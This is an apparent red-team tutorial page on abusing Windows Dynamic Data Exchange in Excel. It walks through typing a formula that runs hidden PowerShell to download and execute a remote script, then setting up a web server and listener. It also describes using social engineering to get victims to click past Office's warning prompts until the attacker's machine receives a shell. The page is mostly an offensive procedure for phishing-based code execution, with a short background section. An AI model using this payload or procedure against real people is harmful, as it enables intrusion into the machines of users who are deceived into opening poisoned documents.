Attachments: Dynamic Data Exchange

Windows Dynamic Data Exchange (DDE) is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplication's of changes to a data item), and requests for command execution.

Object Linking and Embedding (OLE), or the ability to link data between documents, was originally implemented through DDE. Despite being superseded by COM, DDE may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry Keys.

Adversaries may use DDE to execute arbitrary commands. Microsoft Office documents can be poisoned with DDE commands, directly or through embedded files, and used to deliver execution via phishing campaigns or hosted Web Content, avoiding the use of Visual Basic for Applications (VBA) macros. DDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to command line execution.

The techniques for this Demo will use Excel as there are different procedures for the various Office products but the syntax should be the same

As of 2017 Some products don't support DDE no more but Excel and Outlook do still by default

We start by opening a new Excel Spreadsheet and type the syntax into the Formula Box on the A1 cell

On the formula we will write the following syntax. If you receive a formula error it will usually highlight where the error is located, it's a lot of trial and error but this syntax should be simple to follow

=cmd|'/c powershell.exe -w hidden IEX (New-Object Net.WebClient).DownloadString(\"\");'!_xlbgnm.A1

From here we will need and setup our web server and our listener so that the DDE can download and execute our shell and our listener to catch it.

A simple warning will ask the user to Enable the Content here our Social Engineering will come in hand by explaining why the user should do this.

Once they enable a Second Prompt will show what is trying to be executed, if we manage to get the user pass this we should be doing good.

They click Yes and we can see our attacking machine receive a connection.

Last updated